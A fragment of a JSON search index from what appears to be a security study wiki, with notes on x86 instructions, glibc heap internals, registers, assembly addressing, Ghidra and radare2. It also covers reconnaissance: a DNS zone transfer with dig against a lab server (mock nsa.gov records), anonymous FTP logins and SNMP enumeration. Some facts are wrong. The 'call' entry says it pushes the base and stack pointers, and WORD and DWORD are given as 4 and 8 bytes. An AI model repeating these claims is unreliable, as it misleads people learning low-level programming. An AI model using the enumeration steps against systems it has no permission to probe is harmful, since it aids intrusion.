0x6A2B10","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jmp","id":"280","title":"jmp"},"281":{"body":"Used for invoking procedures. It first pushes the values of the base and stack pointers onto the stack and then jumps to the specified address. After the function is finished, a ret instruction is issued which restores the values of the stack and base pointers from the stack and continues execution from where it left off.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » call","id":"281","title":"call"},"282":{"body":"It compares the value of its two operands and sets the according flags depending on the result: cmp rax, rdx If rax < rdx, the zero flag is set to 0 and the carry flag is set to 1. If rax > rdx, the zero flag is set to 0 and the carry flag is set to 0. If rax = rdx, the zero flag is set to 1 and the carry flag is set to 0.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » cmp","id":"282","title":"cmp"},"283":{"body":"jump-if-zero and jump-if-not-zero execute depending on the state of the zero flag.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jz / jnz","id":"283","title":"jz / jnz"},"284":{"body":"The heap is a memory region which allows for dynamic allocation. Memory on the heap is allotted at runtime and programs are permitted to freely request additional heap memory whenever it is required. It is the program's job to request and relieve any heap memory only once . Failure to do so can result in undefined behaviour. In C, heap memory is usually allocated through the use of malloc and whenever the program is finished with this data, the free function must be invoked in order to mark the area as available for use by the operating system and/or other programs. Heap memory can also be allocated by using malloc-compatible heap functions like calloc, realloc and memalign or in C++ using the corresponding new and new[] operators as well as their deallocation counterparts delete and delete[].","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The Heap","id":"284","title":"The Heap"},"285":{"body":"Do not read or write to a pointer returned by malloc after that pointer has been passed to free. -> Can lead to use after free vulnerabilities. Do not use or leak uninitialised information in a heap allocation. -> Can lead to information leaks or uninitialised data vulnerabilities. Do not read or write bytes after the end of an allocation. -> Can lead to heap overflow and read beyond bounds vulnerabilities. Do not pass a pointer that originated from malloc to free more than once. -> Can lead to double delete vulnerabilities. Do not write bytes before the beginning of the allocation. -> Can lead to heap underflow vulnerabilities. Do not pass a pointer that did not originate from malloc to free. -> Can lead to invalid free vulnerabilities. Do not use a pointer returned by malloc before checking if the function returned NULL. -> Can lead to null-dereference bugs and sometimes arbitrary write vulnerabilities. The implementation of the heap is platform specific.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Heap Rules","id":"285","title":"Heap Rules"},"286":{"body":"The heap grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The GLIBC Heap","id":"286","title":"The GLIBC Heap"},"287":{"body":"The heap manager allocates resources in the so-called chunks . These chunks are stored adjacent to each other and must be 8-byte aligned or 16-byte aligned on 32-bit and 64-bit systems respectively. In addition to this padding, each chunks contains metadata which provides information about the chunk itself. Consequently, issuing a request for memory allocation on the heap actually allocates more bytes than originally requested. It is important to distinguish between in-use chunks and free (or previously allocated) chunks, since they have disparate memory layouts. The following diagram outlines a chunk that is in use: The size field contains the chunk size in bytes. The following three bits carry specific meaning: A (0x04) - Allocated arena. If this bit is 0, the chunk comes from the main arena and the main heap. If this bit is 1, the chunk comes from mmap'd memory and the location of the heap can be computed from the chunk's address. M (0x02) - If this bit is set, then the chunk was mmap-ed and isn't part of a heap. Typically used for large allocations. P (0x01) - If this bit is set, then the previous chunk should not be considered for coalescing and the mchunkptr points to a previous chunk still in use A free chunk looks a bit different: The size and AMP fields carry on the same meaning as those in chunks that are in use. Free chunks are organised in linked or doubly linked lists called bins . The fwd and bck pointers are utilised in the implementation of those linked lists. Different types of bins exist for different purposes. The top of the heap is by convention called the top chunk .","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Chunks","id":"287","title":"Chunks"},"288":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Memory Allocation on the Heap","id":"288","title":"Memory Allocation on the Heap"},"289":{"body":"When an application requests heap memory, the heap manager traverses the bins in search of a free chunk that is large enough to service the request. If such a chunk is found, it is removed from the bin, turned into an in-use chunk and then a pointer is returned to the user data section of the chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from Free Chunks","id":"289","title":"Allocating from Free Chunks"},"29":{"body":"A Zone transfer request provides the means for copying a DNS zone file from one name server to another. This, however, only works over TCP. By doing this, you can obtain all the records of a DNS server for a particular zone. This is done through the AXFR request type: dig @ AXFR ┌──(cr0mll0@kali)-[~]-[]\n└─$ dig @192.168.129.138 AXFR nsa.gov ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 AXFR nsa.gov\n; (1 server found)\n;; global options: +cmd\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\nnsa.gov. 3600 IN NS ns1.nsa.gov.\nnsa.gov. 3600 IN NS ns2.nsa.gov.\nnsa.gov. 3600 IN MX 10 mail1.nsa.gov.\nnsa.gov. 3600 IN MX 20 mail2.nsa.gov.\nfedora.nsa.gov. 3600 IN TXT \"The black sparrow password\"\nfedora.nsa.gov. 3600 IN AAAA fd7f:bad6:99f2::1337\nfedora.nsa.gov. 3600 IN A 10.1.0.80\nfirewall.nsa.gov. 3600 IN A 10.1.0.105\nfw.nsa.gov. 3600 IN A 10.1.0.102\nmail1.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.25 ~all\"\nmail1.nsa.gov. 3600 IN A 10.1.0.25\nmail2.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.26 ~all\"\nmail2.nsa.gov. 3600 IN A 10.1.0.26\nns1.nsa.gov. 3600 IN A 10.1.0.50\nns2.nsa.gov. 3600 IN A 10.1.0.51\nprism.nsa.gov. 3600 IN A 172.16.40.1\nprism6.nsa.gov. 3600 IN AAAA ::1\nsigint.nsa.gov. 3600 IN A 10.1.0.101\nsnowden.nsa.gov. 3600 IN A 172.16.40.1\nvpn.nsa.gov. 3600 IN A 10.1.0.103\nweb.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nwebmail.nsa.gov. 3600 IN A 10.1.0.104\nwww.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nxkeyscore.nsa.gov. 3600 IN TXT \"knock twice to enter\"\nxkeyscore.nsa.gov. 3600 IN A 10.1.0.100\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\n;; Query time: 4 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Fri Sep 17 22:38:47 EEST 2021\n;; XFR size: 27 records (messages 1, bytes 709)","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » DNS Zone Transfer","id":"29","title":"DNS Zone Transfer"},"290":{"body":"If no free chunk is found that can service the request, the heap manager must construct an entirely new chunk at the top of heap. To achieve this, it first needs to ascertain whether there is enough space at the top of the heap to hold the new chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from the Top Chunk","id":"290","title":"Allocating from the Top Chunk"},"291":{"body":"Once the free space at the top of the heap is used up, the heap manager will have to ask the kernel for additional memory. On the initial heap, the heap manager asks the kernel to allocate more memory at the end of the heap by calling sbrk.On most Linux-based systems this function internally uses a system call called brk. Eventuall, the heap will grow to its maximum size, since expanding it any further would cause it to intrude on other sections of the process' address space. In this case, the heap manager will resort to using mmap to map new memory for heap expansions. If mmap also fails, then the process is unable to allocate more memory and malloc returns NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Requesting Additional Memory at the Top of the Heap from the Kernel","id":"291","title":"Requesting Additional Memory at the Top of the Heap from the Kernel"},"292":{"body":"Large chunks get treated differently in their allocation. These are allocated off-heap through the direct use of mmap calls and this is reflected in the chunk's metadata by setting the M bit to 1. When such allocations are later returned to the heap manager via a call to free, the heap manager releases the entire mmap-ed region back to the system via munmap. Different platforms have different default thresholds for what counts as a large chunk and what doesn't.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating Large Chunks","id":"292","title":"Allocating Large Chunks"},"293":{"body":"Multithreaded applications require that internal data structures on the heap are protected from race conditions. In the past, the heap manager availed itself of a global mutex before every heap operation, however, significant performance issues arose as a result. Consequently, the concept of \"arenas\" was introduced. Each arena consists of a separate heap which manages its own chunk allocation and bins. Although each arena still utilises a mutex for its internal operations, different threads can make use of different arenas to avoid having to wait for each other. The initial (main) arena consists of a single heap and for single-threaded applications it is all there ever will exist. However, as more threads are spawned, new arenas are allocated and attached to them. Once all available arenas are being utilised by threads, the heap manager will commence creating new ones until a limit - 2 * Number of CPU cores for 32-bit and 8 * Number of CPU cores for 64-bit processes - is reached. Afterwards, multiple threads will be forced to share the same arena.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Arenas","id":"293","title":"Arenas"},"294":{"body":"Free chunks are organised in the so-called bins which are essentially linked lists. For performance reasons different types of bins exist. There are 62 small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per thread. The last two appeared later and are built on top of the first three. Pointers to the small, large, and unsorted bins are stored in the same array in the heap manager: BIN[0] -> invalid (unused)\nBIN[1] -> unsorted bin\nBIN[2] to BIN[63] -> small bins\nBIN[64] to BIN[126] -> large bins","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Bins","id":"294","title":"Bins"},"295":{"body":"There are 62 small bins and each of them stores chunks of a fixed size. Each chunk with a size less than 512 bytes on 32-bit systems and 1024 bytes on 64-bit systems has a corresponding small bin. Small bins are sorted by default due to the fixed size of their elements and Insertion and removal of entries on these bins is incredibly fast.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Small Bins","id":"295","title":"Small Bins"},"296":{"body":"There are 63 large bins and they resemble small bins in their operation but store chunks of different sizes. Consequently, insertions and removal of entries on these lists is slower, since the entire bin has to be traversed in order to find a suitable chunk. There is a different number of bins allocated for specific chunk size ranges. The size of the chunk size range begins at 64 bytes - there are 32 bins all of which shift the range of chunk sizes they store by 64 from the previous bin. Following are 16 bins which shift the range by 512 bytes and so on. In essence: Bin 1 -> stores chunks of sizes 512 - 568 bytes; Bin 2 -> stores chunks of sizes 576 - 632 bytes; ... There are: Number of Bins Spacing between Bins 32 64 16 512 8 4096 4 32768 2 262144 1 Remaining chunk sizes","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Large Bins","id":"296","title":"Large Bins"},"297":{"body":"There is a single unsorted bin. Chunks from small and large bins end up directly in this bin after they are freed. The point of the unsorted bin is to speed up allocations by serving a sort of cache. When malloc is invoked, it will first traverse this bin and see if it can immediately service the request. If not, it will move onto the small or large bins respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Unsorted Bins","id":"297","title":"Unsorted Bins"},"298":{"body":"Fast bins provide a further optimisation layer. Recently released small chunks are put in fast bins and are not initially merged with their neighbours. This allows for them to be repurposed forthwith, should a malloc request for that chunk size come very soon after the chunk's release. There are 10 fast bins, covering chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80, and 88 bytes plus chunk metadata. Fast bins are implemented as singly linked lists and insertions and removals of entries in them are really fast. Periodically, the heap manager consolidates the heap - chunks in the fast bins are merged with the abutting chunks and inserted into the unsorted bin. This consolidation occurs when a malloc request is issued for a size that is larger than a fast bin can serve (chunks over 512 bytes on 32-bit systems and over 1024 bytes on 64-bit systems), when freeing a chunk larger than 64KB or when malloc_trim or mallopt is invoked.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Fast Bins","id":"298","title":"Fast Bins"},"299":{"body":"A new caching mechanism called tcache (thread local caching) was introduced in glibc version 2.26 back in 2017. The tcache stores bins of fixed size small chunks as singly linked lists. Similarly to a fast bin, chunks in tcache bins aren't merged with adjoining chunks. By default, there are 64 tcache bins, each containing a maximum of 7 same-sized chunks. The possible chunk sizes range from 12 to 516 bytes on 32-bit systems and from 24 to 1032 bytes on 64-bit systems. When a chunk is freed, the heap manager checks if the chunk fits into a tcache bin corresponding to that chunk size. If the tcache bin for this size is full or the chunk is simply too big to fit into a tcache bin, the heap manager obtains a lock on the arena and proceeds to comb through other bins in order to find a suitable one for the chunk. When malloc needs to service a request, it first checks the tcache for a chunk of the requested size that is available and should such a chunk be found, malloc will return it without ever having to obtain a lock. If the chunk too big, malloc continues as before. A slightly different strategy is employed if the requested chunk size does have a corresponding tcache bin, but that bin is simply full. In that case, malloc obtains a lock and promotes as many heap chunks of the requested size to tcache chunks, up to the tcache bin limit of 7. Subsequently, the last matching chunk is returned.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » TCache Bins","id":"299","title":"TCache Bins"},"3":{"body":"Any major changes outside of the eight category folders in the Notes/ directory are not permitted and will be rejected.","breadcrumbs":"Cyberclopaedia » Contributing » Out-of-Scope","id":"3","title":"Out-of-Scope"},"30":{"body":"The File Transfer Protocol (FTP) is a common protocol which you may find during a penetration test. It is a TCP-based protocol and runs on port 21. Luckily, its enumeration is simple and rather straight-forward. You can use the ftp command if you have credentials: ftp You can then proceed with typical navigation commands like dir, cd, pwd, get and send to navigate and interact with the remote file system. If you don't have credentials you can try with the usernames guest, anonymous, or ftp and an empty password in order to test for anonymous login.","breadcrumbs":"Reconnaissance » Enumeration » FTP Enumeration (21) » Introduction","id":"30","title":"Introduction"},"300":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » malloc and free","id":"300","title":"malloc and free"},"301":{"body":"First, every allocation exists as a memory chunk which is aligned and contains metadata as well as the region the programmer wants. When a programmer requests memory from the heap, the heap manager first works out what chunk size the allocation request corresponds to, and then searches for the memory in the following order: If the size corresponds with a tcache bin and there is a tcache chunk available, return that immediately. If the request is huge, allocate a chunk off-heap via mmap. Otherwise obtain the arena heap lock and then perform the following steps, in order: Try the fastbin/smallbin recycling strategy If a corresponding fast bin exists, try and find a chunk from there (and also opportunistically prefill the tcache with entries from the fast bin). Otherwise, if a corresponding small bin exists, allocate from there (opportunistically prefilling the tcache as we go). Resolve all the deferred frees - Otherwise merge the entries in the fast bins and move their consolidated chunks to the unsorted bin. - Go through each entry in the unsorted bin. If it is suitable, return it. Otherwise, put the unsorted entry on its corresponding small/large bin as we go (possibly promoting small entries to the tcache). Default back to the basic recycling strategy If the chunk size corresponds with a large bin, search the corresponding large bin now. Create a new chunk from scratch Otherwise, there are no chunks available, so try and get a chunk from the top of the heap. If the top of the heap is not big enough, extend it using sbrk. If the top of the heap can’t be extended because we ran into something else in the address space, create a discontinuous extension using mmap and allocate from there If all else fails, return NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocation","id":"301","title":"Allocation"},"302":{"body":"If the pointer is NULL, do nothing. Otherwise, convert the pointer back to a chunk by subtracting the size of the chunk metadata. Perform a few sanity checks on the chunk, and abort if the sanity checks fail. If the chunk fits into a tcache bin, store it there. If the chunk has the M bit set, give it back to the operating system via munmap. Otherwise we obtain the arena heap lock and then: If the chunk fits into a fastbin, put it on the corresponding fastbin. If the chunk size is greater than 64KB, consolidate the fastbins immediately and put the resulting merged chunks on the unsorted bin. Merge the chunk backwards and forwards with neighboring freed chunks in the small, large, and unsorted bins. If the resulting chunk lies at the top of the heap, merge it into the top chunk. Otherwise store it in the unsorted bin.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Deallocation","id":"302","title":"Deallocation"},"303":{"body":"Registers are value containers which reside on the CPU and not in RAM. They are small in size and some have special purposes. You may store both addresses and values in registers and depending on the instruction used the data inside will be interpreted in a different way - this is commonly called an addressing mode . In x86 Intel assembly (i386), the registers are 32 bits (4 bytes) in size and some of them are reserved: ebp - the base pointer, points to the bottom of the current stack frame esp - the stack pointer, points to the top of the current stack frame eip - the instruction pointer, points to the next instruction to be executed The other registers are general purpose registers and can be used for anything you like: eax, ebx, ecx, edx, esi, edi. x64 AMD assembly (amd64) extends these 32-bit registers to 64-bit ones and denotes these new versions by replacing the initial e with an r: rbp, rsp, rip, rax, ... It is important to note that these are not different registers - eax and rax refer to the same space on the CPU, however, eax only provides access to the lower 32 bits of the 64-bit register. You can also get access to the lower 16 and 8 bits of the register using different names: 8 Byte Register Lower 4 Bytes Lower 2 Bytes Lower Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, you cannot access the lower 16 or 8 bits of the instruction pointer. You might sometimes see WORD or DWORD being used in a similar context - WORD means 4 bytes and DWORD means 8 bytes.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Registers","id":"303","title":"Registers"},"304":{"body":"Under x64 Linux, function arguments are passed via registers: rdi: First Argument\nrsi: Second Argument\nrdx: Third Argument\nrcx: Fourth Argument\nr8: Fifth Argument\nr9: Sixth Argument The return value is store in rax (eax on 32-bit machines).","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Use in x64 Linux","id":"304","title":"Register Use in x64 Linux"},"305":{"body":"Register dereferencing occurs when the value of the register is treated as an address to the actual data to be used, rather than the data itself. This means that addressed can be stored in registers and used later - this is useful when dealing with large data sizes. For example, mov rax, [rdx] Will check the value inside rdx and treat it as an address - it will go to the location where this address points and get its data from there. It will then move this data into rax. If we hadn't used [], it would have treated the address in rdx simply as a value and moved it directly into rax.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Dereferencing","id":"305","title":"Register Dereferencing"},"306":{"body":"Ghidra is an open-source framework for reverse engineering developed by the NSA. It groups binaries into projects which can be shared amonst multiple people.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Introduction","id":"306","title":"Introduction"},"307":{"body":"To install Ghidra, you can run sudo apt install ghidra.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Installation","id":"307","title":"Installation"},"308":{"body":"File -> New Project Non-Shared Project Select Directory Name the Project","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Creating a Project","id":"308","title":"Creating a Project"},"309":{"body":"File -> Import File Select the binary you want to import Ghidra will automatically detect certain information about the file After importing, Ghidra will display an Import Results Summary containing information about the binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Loading a Binary","id":"309","title":"Loading a Binary"},"31":{"body":"You will need working knowledge of SNMP in order to follow through.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Introduction","id":"31","title":"Introduction"},"310":{"body":"Double-clicking on a program will open it in the Code Browser. A prompt will appear for analysing the binary. Ghidra will attempt to create and label functions, as well as identify any cross-references in memory. Once the binary has been analysed you will be presented with the following screen:","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Initial Analysis » Initial Analysis","id":"310","title":"Initial Analysis"},"311":{"body":"radare2 is an open-source framework for reverse engineering. The framework includes multiple tools which all work in tandem in order to aid in the analysis of binary files. It uses short abbreviations for its commands - single letters - and many of its commands have subcommands which are also expressed as single letters. Luckily, you can always append a ? to a specific command in order to view its subcommands and what they do. To quit radare2, use the q command.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Introduction","id":"311","title":"Introduction"},"312":{"body":"You can load a binary by invoking the r2 command. You might sometimes need to also add the -e io.cache=true option in order to fix relocations in disassembly.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Loading a Binary","id":"312","title":"Loading a Binary"},"313":{"body":"aaa - analyse the binary afl - list the analysed functions axt - list all the places where a function is called. Note, you need to use the flag name that redare automatically creates for funtions after aaa.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Analysis » Analysis","id":"313","title":"Analysis"},"314":{"body":"/ - search the bytes of the binary for a specific string /w - search for wide character strings like Unicode symbols","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Strings » Strings","id":"314","title":"Strings"},"315":{"body":"i - display file information ie - find the program's entry point iM - find the program's main function iz - pull the hard-coded strings from the executable (only the data sections), use izz to get the strings from the entire binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Binary Info » Binary Info","id":"315","title":"Binary Info"},"316":{"body":"Flags resemble bookmarks. They associate a name with a given offset in a file. Create a new flag f @ offset You can also remove a flag by appending - to the command: f- List available flags - f: Rename a flag fr ","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flags","id":"316","title":"Flags"},"317":{"body":"Flag names should be unique for addressing reasons. However, it is often the case that you need to have simple and ubiquitous names like loop or return. For this purpose exist the so-called \"local\" flags, which are tied to the function where they reside. It is possible to add them using f. command:","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Local Flags","id":"317","title":"Local Flags"},"318":{"body":"Flags can be grouped into flag spaces - is a namespace for flags, grouping together similar flags. Some flag spaces include sections, registers, symbols. These are managed with the fs command. [0x00001080]> fs?\nUsage: fs [*] [+-][flagspace|addr] # Manage flagspaces\n| fs display flagspaces\n| fs* display flagspaces as r2 commands\n| fsj display flagspaces in JSON\n| fs * select all flagspaces\n| fs flagspace select flagspace or create if it doesn't exist\n| fs-flagspace remove flagspace\n| fs-* remove all flagspaces\n| fs+foo push previous flagspace and set\n| fs- pop to the previous flagspace\n| fs-. remove the current flagspace\n| fsq list flagspaces in quiet mode\n| fsm [addr] move flags at given address to the current flagspace\n| fss display flagspaces stack\n| fss* display flagspaces stack in r2 commands\n| fssj display flagspaces stack in JSON\n| fsr newname rename selected flagspace","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flag Spaces","id":"318","title":"Flag Spaces"},"319":{"body":"Moving around the file requires the usage of the seek (s) command in order to change the offset at which we are. It takes one argument which is a mathematical expression capable of containing flag names, parenthesis, addition, substraction, multiplication of immediates of contents of memory using brackets. Examples: [0x00000000]> s 0x10\n[0x00000010]> s+4\n[0x00000014]> s-\n[0x00000010]> s+\n[0x00000014]> Here is a list of additional seeking commands: [0x00000000]> s?\nUsage: s # Help for the seek commands. See ?$? to see all variables\n| s Print current address\n| s.hexoff Seek honoring a base from core->offset\n| s:pad Print current address with N padded zeros (defaults to 8)\n| s addr Seek to address\n| s- Undo seek\n| s-* Reset undo seek history\n| s- n Seek n bytes backward\n| s--[n] Seek blocksize bytes backward (/=n)\n| s+ Redo seek\n| s+ n Seek n bytes forward\n| s++[n] Seek blocksize bytes forward (/=n)\n| s[j*=!] List undo seek history (JSON, =list, *r2, !=names, s==)\n| s/ DATA Search for next occurrence of 'DATA'\n| s/x 9091 Search for next occurrence of \\x90\\x91\n| sa [[+-]a] [asz] Seek asz (or bsize) aligned to addr\n| sb Seek aligned to bb start\n| sC[?] string Seek to comment matching given string\n| sf Seek to next function (f->addr+f->size)\n| sf function Seek to address of specified function\n| sf. Seek to the beginning of current function\n| sg/sG Seek begin (sg) or end (sG) of section or file\n| sl[?] [+-]line Seek to line\n| sn/sp ([nkey]) Seek to next/prev location, as specified by scr.nkey\n| so [N] Seek to N next opcode(s)\n| sr pc Seek to register\n| ss Seek silently (without adding an entry to the seek history) > 3s++ ; 3 times block-seeking\n> s 10+0x80 ; seek at 0x80+10","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Seeking » Seeking","id":"319","title":"Seeking"},"32":{"body":"snmp-check is a simple utility for basic SNMP enumeration. You only need to provide it with the IP address to enumerate: snmp-check [IP] Furthermore, you have the following command-line options: -p: Change the port to enumerate. Default is 161. -c: Change the community string to use. Default is public -v: Change the SNMP version to use. Default is v1. There are additional arguments that can be provided but these are the salient ones.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmp-check","id":"32","title":"SNMP Enumeration using snmp-check"},"320":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » Introduction","id":"320","title":"Introduction"},"321":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Introduction","id":"321","title":"Introduction"},"322":{"body":"Variables in assembly do not exists in the same sense as they do in higher-level programming languages. This is especially true of local variabls such as those inside functions. Instead of allocating space for a particular value and having that place be \"named\" according to a variable, the compiler may use a combination of stack and heap allocations as well as registers to achieve behaviour resembling a variable. That being said, there are some parallels with higher-level programming languages as well. When manually programming assembly, it should be noted that variable names are more or less identical to addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Introduction","id":"322","title":"Introduction"},"323":{"body":"Assembly constants cannot be changed during run-time execution. Their value is substituted at assembly-time (corresponding to compile-time substitution for constants in higher-level languages). Consequently, constants are not even assigned a location in memory, for they turn into hard-coded values. Defining constants in assembly is done in the following way: equ For example, EXAMPLE equ 0xdeadbeef","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Constants","id":"323","title":"Constants"},"324":{"body":"Static or global variables which are initialised before the programme executes are stored in the .data section. In order to define such a variable, you must give it a name, data size and value. In contrast with constants, such data can be mutated during run-time. The following data size declarations can be used: Declaration Size (in bits) Type db 8 dw 16 dd 32 dq 64 ddq 128 Integer dt 128 Floating-Point The syntax for declaring such variables is as follows: For example: byteVar db 0x1A ; byte variable","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Initialised Data","id":"324","title":"Static Initialised Data"},"325":{"body":"Static uninitialised data is stored in the .bss section. The syntax for allocating such variables is following: Such variables are usually allocated as chunks, hence the required count. The primary data types are as follows: Declaration Size (in bits) resb 8 resw 16 resd 32 resq 64 resdq 128 Some examples: bArr resb 10 ; 10 element byte array wArr resw 50 ; 50 element word array dArr resd 100 ; 100 element double array qArr resq 200 ; 200 element quad array","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Uninitialised Data","id":"325","title":"Static Uninitialised Data"},"326":{"body":"Data representation refers to the way that values are stored in a computer. For technical reasons, computers do not use the familiar base-10 number system but rather avail themselves of the base-2 (binary) system. Under this paradigm, numbers are represented as 1's and 0's.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Introduction","id":"326","title":"Introduction"},"327":{"body":"When storing an integer value, there are two ways to represent it - signed and unsigned - depending on whether the value should be entirely non-negative or may also have a \"-\" sign. Based on the number of bits used for storing a value, the value may have a different range. Size Range Size Unsigned Range Signed Range Byte (8 bits) 28 [0..255] [−128..+127] Word (16 bits) 216 [0..65,535] [−32,768..+32,767] Doubleword (32 bits) 232 [0..4,294,967,295] [−2,147,483,648..+2,147,483,647] Quadword (64 bits) 264 [0..264−1] [−263..+263−1] Double Quadword (128 bits) 2128 [0..2128−1] [−2127..+2127−1] Unsigned integers are represented in their typical binary form.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Integer Representation","id":"327","title":"Integer Representation"},"328":{"body":"Signed integers are represented using two's complement. In order to convert a acquire the negative form of a number in two's complement, is two negate all of its bits and add 1 to the number. A corollary of this representation is that it adds no complexity to the addition and subtraction operations.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Two's Complement","id":"328","title":"Two's Complement"},"329":{"body":"Addressing modes refer to the supported methods for accessing and manipulating data. There are three basic addressing modes in x86-64: register, immediate and memory.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Introduction","id":"329","title":"Introduction"},"33":{"body":"snmpwalk is a much more versatile tool for SNMP enumeration. It's syntax is mostly the same as snmp-check:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmpwalk","id":"33","title":"SNMP Enumeration using snmpwalk"},"330":{"body":"In register mode addressing, the operand is a register ( brain undergoing nuclear-fission ). mov rax, rbx The value inside rbx is copied to rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Register Mode Addressing","id":"330","title":"Register Mode Addressing"},"331":{"body":"In immediate mode addressing, the operand is an immediate value, or a literal . These are simply constant values such as 10, 0xfa3, \"lol\", and so on. mov rax, 123 The number 123 is copied into rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Immediate Mode Addressing","id":"331","title":"Immediate Mode Addressing"},"332":{"body":"In memory mode addressing, the operand is treated as a memory location. This is referred to as indirection or dereferencing and is similar to how pointers can be dereferenced in C/C++. In assembly, this is done by wrapping the operand in square brackets: []. So for example, rax refers to the value stored within the register rax. However, [rax] means \"treat rax like a pointer and use the value it points to\". Essentially, [rax] treats the value inside the register as an address and uses that address to find the actual value it needs. mov DWORD PTR [rax], 0xdeadbeef The value 0xdeadbeef is copied into the location pointed to by rax. Since memory is byte-addressable, it is oftentimes required to specify how many bytes we want to access. This is done by prepending one of the following specifiers to the operand: Specifier Number of Bytes BYTE PTR / byte 1 WORD PTR / word 2 DWORD PTR / dword 4 QWORD PTR / qword 8 Moreover, the actual formula for memory addressing is a bit more complicated, since it was developed mainly for making the implementation of arrays easier. [baseAddr + (indexReg * scaleValue) + offset] The baseAddr must be a register or variable name, although it may be omitted in which case the address is relative to the beginning of the data segment. indexReg is a register which specifies contains an index into the array and the scaleValue is the size (in bytes) of a single member of the array. The offset must be an immediate value. mov eax, dword [ebx] ; move into eax the value which ebx points to\nmov rax, QWORD PTR [rbx + rsi] ; move into rax the value which (rbx + rsi) points to\nmov rcx, qword [rax+(rsi*8)] ; move into rcx the value which (rax + (rsi*8)) points to","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Memory Mode Addressing","id":"332","title":"Memory Mode Addressing"},"333":{"body":"Memory is nothing more than a series of bytes which can be individually addressed. When storing values which are larger than a single byte, the bytes under the x86-64 paradigms are stored in little-endian order - the least significant byte (LSB) at the lowest memory address and the most significant byte (MSB) at the highest memory address. For example, the variable var = 0xDEADBEEF would be represented in memory as follows: Note how the right-most byte is at a lower address and the addresses for the rest of the bytes increase as we go right-to-left.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » 